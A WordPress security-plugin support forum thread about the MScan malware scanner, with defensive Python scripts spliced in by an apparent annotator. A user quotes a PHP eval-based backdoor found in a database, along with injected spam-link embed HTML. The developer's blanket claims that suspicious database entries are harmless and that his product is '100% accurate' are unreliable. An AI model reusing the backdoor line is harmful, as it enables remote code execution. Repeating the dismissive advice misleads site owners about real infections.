MScan – Troubleshooting, questions, problems and code posting


Viewing 15 posts - 46 through 60 (of 64 total)
  • #40086
    Living Miracles
    Participant

    Hello,

    I just wanted to write a reply now to see if there is any ETA update on the release of BPS Pro version 15.3, which includes the new MScan rebuild.

    Thank you and looking forward to your response.

    #40088
    AITpro Admin
    Keymaster

    Things have changed drastically.  The MScan rebuild has been pulled out of BPS Pro 15.3 (currently 80% completed) due to unforeseen problems and life in general.  😉  In order to get important updates out in BPS Pro 15.3 quicker I am pulling the MScan rebuild from 15.3.  The MScan rebuild will be available in BPS Pro 15.4 – No ETA is available for the BPS Pro 15.4 release.

    #40089
    AITpro Admin
    Keymaster

    So just don’t use MScan until it is rebuilt.  Currently MScan is not user friendly or very accurate, which is pretty common with most conventional website malware scanners.  BPS Pro AutoRestore|Quarantine is 100% accurate and is far superior to any/all website malware scanners.  So continue to rely on BPS Pro ARQ IDPS.

    #40090
    Living Miracles
    Participant

    Okay, I see. Well, thank you for the update and for letting us know about that. We’re looking forward to using this newly rebuilt MScan and will await version 15.4 for it.

    #40480
    Living Miracles
    Participant

    Hello,

    I’ve been getting into testing out MScan on some of our sites lately and loving this powerful malware scanner. I’ve also read all the documentation I could find on it. That being said, from my testing thus far, I have the following questions and notes I want to post here:

    • Should the BPS Pro plugin be getting checked by MScan as well or is this somehow covered? I tried uploading a .zip copy of this premium plugin through the “Upload Plugin Zip Files” button, but it doesn’t seem to work each time after I run the MScan as the BPS Pro files don’t get added to the “plugin-hashes.php” file and it just unzips the “bulletproof-security” plugin folder and exports its files and folders within it and keeps the .zip file there as well. Here is a screenshot of what I’m seeing when I try this.
      • On the “MScan Report” page, within the “WP Core|Plugin|Theme File Hashes” area, it says “No File Hashes for This Plugin” for the “bulletproof-security Plugin Hash File Version” row. Then, on the “MScan Log” page, it mentions this in the log: Plugin Zip File Download: WP_Error: Unable to download Plugin zip file: bulletproof-security.15.5.zip from WordPress.org. So these couple of things also make it seem like we should be uploading this plugin .zip file and MScan should be checking this plugin.
    • We have many WordPress sites (40+) and many of them use premium plugins and/or themes. From what I’ve read, MScan will not be able to automatically retrieve these plugins or themes, or even plugins that don’t have their version number in the .zip file name, to create hashes for them. In this case, can you confirm that whenever one of these plugins or themes gets updated that I would need to manually re-upload the updated .zip file for it through the BPS Pro plugin on each associated website in order for MScan to work correctly in scanning/checking these plugins or themes on it moving forward?
      • Also, we have a child theme folder on each website. Can you confirm that any time we change a file in the child theme folder we would need to re-upload a fresh .zip file for this through the BPS Pro plugin for MScan to work correctly in scanning/checking that folder moving forward?
    • On the sites I’ve tested so far, MScan did catch some suspicious files and database entries. I’m new to this, so I thought I would briefly share how I’m checking them in general and see if this is what you would do or if there are some tips that you could share in determining if something is truly malicious or not:
      • For files, I would briefly review the code and see if anything seems obviously strange or not. If I wasn’t 100% confident, I would then upload the file to VirusTotal and see if any of the results from that mark the file as malicious.
        • For example, one file MScan caught was a favicon.ico file in /wp-content/uploads/ due to a pattern match of \2n5. I viewed the image and it seems to be something that we could be using on the site, and I uploaded it to VirusTotal and nothing there detected something malicious. Am I potentially missing something here? Is it actually possible for a favicon.ico file, or any other image file, to contain malicious code?
      • For database entries, it has been “<iframe”, “<noscript”, and “<script” code that has got caught so far. I would briefly review the contents of the code between the opening and closing of those tags each time to see if I recognized something or the domain within it and see if it makes sense with the site I found this on. For this, however, I don’t really have a secondary tool I can use to help check these entries but I believe it has felt obvious enough so far.
        • For example, on one site, where we had many Vimeo and YouTube videos embedded on it, I decided to just skip and ignore all the database entries that had Vimeo and YouTube embed links in them without reviewing each one. This was to speed up the process since over 1,600 suspicious entries were caught and I didn’t think there could be a hack that would occur from a Vimeo or YouTube video embed code/link. That being said, please let me know if my thinking here was incorrect.
    • Is it normal behavior that at least on one site, the very last row for a scan, as seen in the MScan Log page, showed a suspicious database entry but this entry didn’t show up in the “View|Ignore Suspicious DB Entries” section on the “MScan 2.0” page? The following is the row I saw in the MScan Log:
      • Scanning Database: DB Table: xxx_relevanssi_log | Column|Field: query | Primary Key ID: 
        Scanning Database: Code Pattern Match: eval( or (lave
        Scanning Database: Database scan completed.
      • I’m not sure if this is malicious or an issue or not since it was found in a database table for a plugin log, but the following was what I found in the database entry when I browsed it:
        • eval(urldecode(urldecode($_post[chr(99).chr(111).chr(100).chr(101).chr(122)])));
    • I’ve been testing out the “Scheduled Scan Frequency” option and I tried all the different options on a couple of sites but there appears to be a glitch/issue with these options as the automatic scan is running every 15–20 minutes, or sometimes in even more frequent intervals, instead of the option I picked. Is this issue only on our end? For our setup, along with us already using ARQ IDPS, it feels very important for us to have this working correctly and be scheduled across all of our sites.
    • Is it normal behavior that after I’ve done a scan, and I then remove some suspicious database entries via phpMyAdmin, that when I do another scan after that the results on the “View|Ignore Suspicious DB Entries” section or “MScan Report” page still show those database entries I’ve removed? I would expect that running another scan after I’ve removed certain entries from the database would make it so that those entries would not show up again. If this is the intended behavior for some reason, is the only way for those results to not show up anymore to use the “Reset MScan” button and to then run a scan after that?
    • I’ve been noticing that even after clicking the “Delete File Hashes Tool” and “Reset MScan” buttons, I’m still experiencing this same issue where it’s still mentioning “File Hash: Altered or unknown Plugin file” for certain plugin files under the “File Hash or Pattern Match” column in the “View|Ignore|Delete Suspicious Files” section. But I have even manually downloaded a fresh copy of the plugin from the WordPress directory and those certain plugin files are there and they’re identical in their contents as what I have on the site. What could be causing this? Is this a bug with MScan?
    • In the BPS Pro PHP Error Log on our sites, I’ve been noticing various continuous PHP Warnings related to MScan. Are any of these something that should be fixed in the plugin? The following are the various PHP Warnings I’m seeing:
      • PHP Warning: Invalid argument supplied for foreach() in /xxxx/xxxx/xxxx/example.com/public_html/wp-content/plugins/bulletproof-security/includes/mscan-theme-hash-maker.php on line 571
        PHP Warning: Invalid argument supplied for foreach() in /xxxx/xxxx/xxxx/example.com/public_html/wp-content/plugins/bulletproof-security/admin/mscan/mscan.php on line 2578
        PHP Warning: Invalid argument supplied for foreach() in /xxxx/xxxx/xxxx/example.com/public_html/wp-content/plugins/bulletproof-security/includes/mscan-theme-hash-maker.php on line 224
        PHP Warning: array_diff_key(): Expected parameter 2 to be an array, null given in /xxxx/xxxx/xxxx/example.com/public_html/wp-content/plugins/bulletproof-security/includes/mscan-theme-hash-maker.php on line 236
        PHP Warning: array_merge(): Expected parameter 2 to be an array, null given in /xxxx/xxxx/xxxx/example.com/public_html/wp-content/plugins/bulletproof-security/includes/mscan-theme-hash-maker.php on line 237
        PHP Warning: A non-numeric value encountered in /xxxx/xxxx/xxxx/example.com/public_html/wp-content/plugins/bulletproof-security/includes/mscan-ajax-functions.php on line 2064

    Please let me know if you need any more information on any of these bullet points.

    Thank you for your time and support,
    Nicolas from Living Miracles

    #40481
    AITpro Admin
    Keymaster

    Since you have BPS Pro then you don’t need to use MScan.  MScan is just a malware scanner.  All website malware scanners are pretty much worthless besides being a basic tool to confirm that your website/hosting account is hacked.  For BPS free users who want to check if their website/hosting account is already hacked they can use MScan.  BPS Pro comes with AutoRestore|Quarantine IDPS, which is far superior to MScan and any/all other website malware scanners.

    #40493
    Living Miracles
    Participant

    Thanks for your response.

    We appreciate your great confidence in ARQ IDPS and we think it’s an amazing security tool as well. That being said, it would be very much appreciated if you could respond to the various questions and notes I had posted. If perhaps there are too many points to respond to within a forum, then I could send these questions to you via email if that works better for you to be able to respond to all of them. Just let me know.

    To us, MScan seems to be a very helpful and possibly essential secondary security tool/scanner for our sites. One of the vulnerabilities with ARQ IDPS that we’ve become aware of is human error. For example, in the past, we mistakenly restored an uploaded file that ARQ caught since we weren’t sure whether it was a safe file or not, and even our hosting provider thought it was fine. It turns out that the file ended up being a malicious/hacker file which we later had to do a bigger clean-up for as a result. We are not security experts, so we aren’t always sure whether a new file or file modification that’s caught by ARQ is safe or malicious. We aren’t always sure we’ll recognize malicious/hacker code. With scheduled MScan running on our sites as a second line of defense, we feel that it could only help us in catching a mistake like this or other potential human errors sooner.

    The other vulnerability is that I read that you previously wrote somewhere in this forum that if a site was already hacked in some way before BPS Pro was set up and being used on the site, then ARQ isn’t guaranteed to function properly or catch other malicious files that are created or uploaded on the site after that. You wrote that once a hacker has a foothold on a site, they can mess with the functionalities of BPS Pro/ARQ. From what I can tell, I don’t think a bigger hack has or is occurring on one of our sites, but when I tested running MScan on it, here are a few of the suspicious database entries it caught:

    (64328, 7820, '_oembed_b7679cf6021238df9e9dceb7b36934a8', '<iframe width=\"1165\" height=\"655\" src=\"https://www.youtube.com/embed/nzVLUElQ0Ho?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),
    (64330, 7820, '_oembed_0b6c969ca65dbbc9409f53498bd8514e', '
    <a href="http://www.menacure.com/import/vzjat-zajm-s-neobhodimoj-summoj-na-sajte/">Взять займ с необходимой суммой на сайте onlinekredit24</a>
    <iframe class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" src=\"http://www.menacure.com/import/vzjat-zajm-s-neobhodimoj-summoj-na-sajte/embed/#?secret=qYrdLgcJqe\" data-secret=\"qYrdLgcJqe\" width=\"600\" height=\"338\" title=\"“Взять займ с необходимой суммой на сайте onlinekredit24” — \" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>'),
    (64333, 7820, '_oembed_eb1dbdfe47c6bbce582d33e0520ef347', '<iframe title=\"Как правильно загорать на солнце. 5 фактов о загаре. Советы врача\" width=\"1165\" height=\"655\" src=\"https://www.youtube.com/embed/O46jcc0zZWg?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),

    I’m glad MScan caught this as we had no idea this was in our site’s database. I’ve gone ahead and removed these entries from our database. We’re not entirely sure if BPS Pro was already installed and set up on this site or not when these entries got into our database. So again, this is where we feel that a scheduled MScan running on our sites would only help in catching things like this on our site sooner or even at all.

    Thank you for your time and looking forward to your responses.

    #40497
    AITpro Admin
    Keymaster

    The myth is that website malware scanners are some sort of essential website security protection, which of course is false.  Computer malware and anti-virus scanners/apps are actually effective and essential.  Those are 2 completely different technologies.  BPS Pro AutoRestore|Quarantine IDPS is modeled after computer malware scanners instead of conventional website malware scanners.  That is why ARQ IDPS is 100% accurate and 100% effective vs conventional website malware scanners that are 80% effective at best.  I created ARQ IDPS 10 years ago.  MScan was created many years later in BPS Pro.  So yeah website malware scanners are simply a tool to be used occasionally to check a website to see if it is infected.  Website malware scanners are “after the fact” vs ARQ IDPS, which is an Intrusion Detection and Prevention System.  Or in other words, ARQ IDPS offers real time protection that detects and stops/prevents the infection at the moment it occurs.

    I don’t recommend that you schedule MScan scans.  I do recommend that you occasionally run an MScan scan – something like once every month.

    In my professional experience with cleaning up 100’s of hacked websites/hosting accounts a website/hosting account has been hacked for months to years before a website owner becomes aware of the hack.  I have seen hacked websites/hosting accounts that have been hacked for up to 7 years without the website owner being aware of the hack.

    I will answer any questions that are relevant in your previous forum post.  The problem is that website scanners have been promoted as something that is an effective website security measure when in fact website malware scanners are simply a basic tool to confirm or eliminate that a website/hosting account is hacked.  A lot of plugins claim their website malware scanner can automatically clean up a hacked website/hosting account.  That is false.  The only way to clean up a hacked website/hosting account is to do the clean up manually > https://forum.ait-pro.com/forums/topic/wordpress-hacked-wordpress-hack-cleanup-wordpress-hack-repair/ , which is a very quick and simple thing to do.

    #40499
    AITpro Admin
    Keymaster

    @ Living Miracles – Regarding your previous forum questions.  I’m not going to go into too much detail.  I’ve said this a few times now and will reiterate it again – MScan is just a malware scanner, which is a basic tool to confirm or eliminate that your website/hosting account is currently hacked or to check if there are left over hacks somewhere (files, code or in your DB) from a previous hack that could have occurred many years ago.

    It is not important to scan the BPS Pro plugin or any other premium/paid plugins or themes.  I included that capability, but it is not essential in my opinion.

    Unfortunately, MScan and all other website malware scanners will detect false positives.  That is a common limitation of website malware scanners.  ARQ IDPS on the other hand does not detect false positives and is always 100% accurate. There is no way to instantly teach someone what is legitimate code vs malicious code.  There is also no way to accurately automate that.  Website malware scanners are very limited/crude vs ARQ IDPS.  A general rule is that if you do not recognize something as something that you created then most likely it is malicious and should be deleted.  You would of course want to back up your website files and/or database before deleting anything.

    Yes, the chr code you posted is malicious.  It is part of a COOKIE injection hack.  You can use this decoder to view the decoded code > https://malwaredecoder.com/. This is important to point out > left over database hacker code will NOT work if the required hacker files have already been deleted. Or in other words, all hacker database code requires counterpart hacker files in order to work. So you would just delete any left over DB hacker code for good measure. There is one exception to DB hacker code requiring a file counterpart in order to work and that is a Spam Link Injection hack, which was a security flaw/vulnerability in old versions of WordPress and some plugins and themes. Spam Link Injections work independently and need to be removed ASAP.

    I will look into the Scheduled Scan Frequency option to see if there are any bugs.

    If you are still seeing old scan results then you have not clicked the Reset MScan button to clear old scan results.

    You do NOT want to click the Delete File Hashes Tool button unless there is a major problem occurring.  Please read the MScan Read Me help button info.

    Yes, you are going to see incorrect “File Hash: Altered or unknown Plugin file” scan results.  Unfortunately, that is another limitation of all malware scanners.  The thing to keep in mind is all malware scanners are simple basic tools that check files against matching patterns or hashes.  There are numerous complications with that and 99% of them are caused by issues directly related to a plugin or theme.  There are also numerous and various other complications and problems that I will not go into.  Once again all malware scanners are simple and basic tools to generally scan files and a database for “possible” malicious things.  All malware scanners cannot achieve 100% accuracy like ARQ IDPS can due to the inherent limitations of conventional website malware scanners.

    I will look into the PHP errors.
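
    As an added illustration (my own code, not MScan's and not from either poster), the Python below runs the database pattern checks named in #40480 over a few constructed rows, decodes the chr() chain from the relevanssi entry so the parameter name is readable (the kind of decoding the admin points to in #40499), and ranks YouTube/Vimeo embeds below an iframe to an unfamiliar domain. Table names, IDs, the sample values and the trusted-host list are all assumptions.

```python
import re

# Constructed sample rows in the shape (table, column, primary key, value).
# They mirror the kinds of entries the thread describes and are not real site data.
SAMPLE_ROWS = [
    ("wp_postmeta", "meta_value", 64328,
     '<iframe width="1165" height="655" src="https://www.youtube.com/embed/nzVLUElQ0Ho'
     '?feature=oembed" frameborder="0" allowfullscreen></iframe>'),
    ("wp_postmeta", "meta_value", 64330,
     '<iframe class="wp-embedded-content" sandbox="allow-scripts" '
     'src="http://www.menacure.com/import/some-page/embed/#?secret=abc"></iframe>'),
    ("wp_relevanssi_log", "query", 17,
     "eval(urldecode(urldecode($_post[chr(99).chr(111).chr(100).chr(101).chr(122)])));"),
    ("wp_options", "option_value", 3, "Plain text that matches nothing"),
]

# The patterns the thread says MScan flags in the database, plus the reversed
# "(lave" form that the MScan log line mentions.
PATTERNS = {
    "iframe": re.compile(r"<iframe", re.I),
    "script": re.compile(r"<script", re.I),
    "noscript": re.compile(r"<noscript", re.I),
    "eval": re.compile(r"\beval\s*\(|\(lave", re.I),
}

# A PHP chr(n).chr(m)... concatenation, the obfuscation seen in the relevanssi row.
CHR_CHAIN = re.compile(r"(?:chr\(\s*\d+\s*\)\s*\.\s*)+chr\(\s*\d+\s*\)", re.I)

# Assumed list of video hosts whose embeds the site owner expects to see.
TRUSTED_EMBED_HOSTS = {"www.youtube.com", "youtube.com", "youtu.be",
                       "player.vimeo.com", "vimeo.com"}


def decode_chr_chains(text):
    """Replace every chr(...) chain with the quoted string it builds, so a
    reviewer sees $_post['codez'] instead of five chr() calls."""
    def repl(match):
        codes = re.findall(r"chr\(\s*(\d+)\s*\)", match.group(0), re.I)
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return CHR_CHAIN.sub(repl, text)


def hostnames(text):
    """Hostnames of every http(s) URL in the value, lower-cased and de-duplicated."""
    return sorted({h.lower() for h in re.findall(r"https?://([^/\"'\s>]+)", text, re.I)})


def triage(rows, trusted_hosts=TRUSTED_EMBED_HOSTS):
    """One finding per row that matches a pattern. priority is "high" for
    eval()-style code, "low" when every URL points at a trusted video host
    (the YouTube/Vimeo case from the thread) and "review" for anything else."""
    findings = []
    for table, column, pk, value in rows:
        matched = [name for name, rx in PATTERNS.items() if rx.search(value)]
        if not matched:
            continue
        hosts = hostnames(value)
        if "eval" in matched:
            priority = "high"
        elif hosts and all(h in trusted_hosts for h in hosts):
            priority = "low"
        else:
            priority = "review"
        findings.append({
            "table": table, "column": column, "id": pk, "matched": matched,
            "hosts": hosts, "priority": priority, "decoded": decode_chr_chains(value),
        })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_ROWS):
        print(f"[{f['priority']}] {f['table']}.{f['column']} id={f['id']} "
              f"matched={f['matched']} hosts={f['hosts']}")
        if f["priority"] == "high":
            print("    decoded:", f["decoded"])
```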

    #40521
    Living Miracles
    Participant

    Thank you for taking the time to share all of that information and context, and for answering our current questions, as well as for looking into the potential issues/bugs with MScan that I’ve pointed out. That’s all helpful and much appreciated.

    We’ll continue on with running MScan on more of our sites to see if any of them have any hacker files or code that we weren’t previously aware of.

    #43297
    beatty2020
    Participant

    A client’s site MScan just displayed some File Hashes and dozens of Pattern matching suspicions.

    Same for suspicious DB Entries.

    Client would like me to just go in and delete everything right away or else make a new website and import xml files of the pages and posts.

    I think it’s faster to go through each suspicious file/db and deal than all that.

    Can you suggest the best plan of action with some verbiage I can give to her to calm her down? We have already updated logins for everything on the site, the emails, the hosting, the cloudflare plan, the ftp, everything.

    Thanks.

    #43301
    AITpro Admin
    Keymaster

    MScan pattern matching is not very accurate and can only generally detect possible hacker code in files.  File Hash checking is very accurate, but I see more and more plugins automatically updating files, which changes the files from what they were when they were originally installed.  What you want to do is check the files that were flagged as suspicious.  If there is not any hacker code in them then it was just a false positive result.

    You can tell the person that MScan scans for suspicious files.  Suspicious files should then be checked to see if they are actually infected/malicious.

    You can completely disregard any suspicious DB entries. Hacker code in a database only works if there are hacker files that go with that hacker code in the DB. Or in other words, hacker code in a DB is completely harmless if its counterpart files do not exist.

    #43307
    beatty2020
    Participant

    OK great about the db needing the files to become malicious.

    So most of the files that were flagged came from Wordfence and WP Rocket. I’ve uninstalled Wordfence even though I like the notifications that a plugin or theme has been abandoned. Just not worth it for this site.

    But when I went via ftp to view the files listed in /wp-content/cache/wp-rocket there are only 2 files there:

    • index.html
    • and an .htaccess file.

    the htaccess file shows only this:

    <IfModule mod_autoindex.c>
    Options -Indexes
    </IfModule>
    

    The index.html is blank.

    But the files that are marked by BPS Pro are a variety of cached blog posts with variations of this:

    /cache/wp-rocket/www.mysamplewebsite.com/title-of-blog-post/index-https.html

    Disregard all of these non-existent files??

    #43308
    AITpro Admin
    Keymaster

    Click the Reset MScan button.  Add an Exclude Individual Folders rule >  /wp-content/cache/ and click the Save Options button.  Then run another scan.
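
    Added example (my own code, not MScan's and not from the thread) modelling the file-hash check described in #43301 and the folder exclusion from #43308: it hashes a constructed plugin tree against a constructed reference, reports altered, unknown and missing files, and shows how excluding the cache folder removes the wp-rocket style false positives from #43307. All paths and file contents are made up.

```python
import hashlib, os, shutil, tempfile
from pathlib import Path

def sha256_file(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()

def hash_tree(root, exclude=()):
    """Map relative POSIX paths to sha256 for every file under root. `exclude`
    holds relative folder paths to skip, the same idea as MScan's "Exclude
    Individual Folders" rule (re-implemented here, not MScan's code)."""
    root = Path(root)
    hashes = {}
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = Path(dirpath).relative_to(root)
        # Prune excluded folders so os.walk never descends into them
        dirnames[:] = [d for d in dirnames if (rel_dir / d).as_posix() not in exclude]
        for name in filenames:
            hashes[(rel_dir / name).as_posix()] = sha256_file(Path(dirpath) / name)
    return hashes

def compare(site_hashes, reference_hashes):
    """altered: hash differs from the reference; unknown: no reference hash
    exists; missing: present in the reference only."""
    altered = sorted(p for p, h in site_hashes.items()
                     if p in reference_hashes and h != reference_hashes[p])
    unknown = sorted(p for p in site_hashes if p not in reference_hashes)
    missing = sorted(p for p in reference_hashes if p not in site_hashes)
    return {"altered": altered, "unknown": unknown, "missing": missing}

# Constructed stand-in for a clean plugin zip downloaded from WordPress.org
REFERENCE_FILES = {
    "sample-plugin.php": "<?php\n/* Plugin Name: Sample Plugin (constructed) */\n",
    "includes/helper.php": "<?php\nfunction sample_helper() { return 1; }\n",
    "readme.txt": "=== Sample Plugin ===\n",
}

def build_demo():
    """Create a temp tree: a clean reference copy and a drifted 'site' wp-content."""
    tmp = Path(tempfile.mkdtemp(prefix="hashcheck-"))
    ref = tmp / "reference"
    site = tmp / "site"
    plugin = site / "plugins" / "sample-plugin"
    for rel, body in REFERENCE_FILES.items():
        for base in (ref, plugin):
            (base / rel).parent.mkdir(parents=True, exist_ok=True)
            (base / rel).write_text(body)
    # The plugin rewrote one of its own files after install (the #43301 scenario)
    (plugin / "includes" / "helper.php").write_text(
        "<?php\nfunction sample_helper() { return 2; }\n")
    # A file the released plugin never shipped, and one deleted on the site
    (plugin / "extra.php").write_text("<?php\n// not in the reference zip\n")
    (plugin / "readme.txt").unlink()
    # Page-cache output with no reference hash: the wp-rocket case from #43307
    cache = site / "cache" / "wp-rocket" / "www.example.com" / "a-post"
    cache.mkdir(parents=True)
    (cache / "index-https.html").write_text("<html>cached copy</html>\n")
    return tmp, ref, site

def run_demo():
    """Return the comparison without and with the cache folder excluded."""
    tmp, ref, site = build_demo()
    try:
        reference = {"plugins/sample-plugin/" + p: h for p, h in hash_tree(ref).items()}
        noisy = compare(hash_tree(site), reference)
        quiet = compare(hash_tree(site, exclude={"cache"}), reference)
    finally:
        shutil.rmtree(tmp)
    return noisy, quiet

if __name__ == "__main__":
    noisy, quiet = run_demo()
    print("no exclusions: ", noisy)
    print("cache excluded:", quiet)
```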

    #43309
    beatty2020
    Participant

    Hopefully one last question on this: after adding the cache folder to “Exclude Individual Folders” rule, and hitting the Reset MScan button, I rescanned and got this as a suspicious file: /public_html/wp-includes/.htaccess

    Seems to have no weird characters. Can you please confirm that this is another file to ignore/exclude?

    # SGS Directory Hardening
    <FilesMatch "\.(?i:php)$">
      <IfModule !mod_authz_core.c>
        Order allow,deny
        Deny from all
      </IfModule>
      <IfModule mod_authz_core.c>
        Require all denied
      </IfModule>
    </FilesMatch>
    <Files wp-tinymce.php>
      <IfModule !mod_authz_core.c>
        Allow from all
      </IfModule>
      <IfModule mod_authz_core.c>
        Require all granted
      </IfModule>
    </Files>
    <Files ms-files.php>
      <IfModule !mod_authz_core.c>
        Allow from all
      </IfModule>
      <IfModule mod_authz_core.c>
        Require all granted
      </IfModule>
    </Files>

    # SGS Directory Hardening END

    Thanks again.
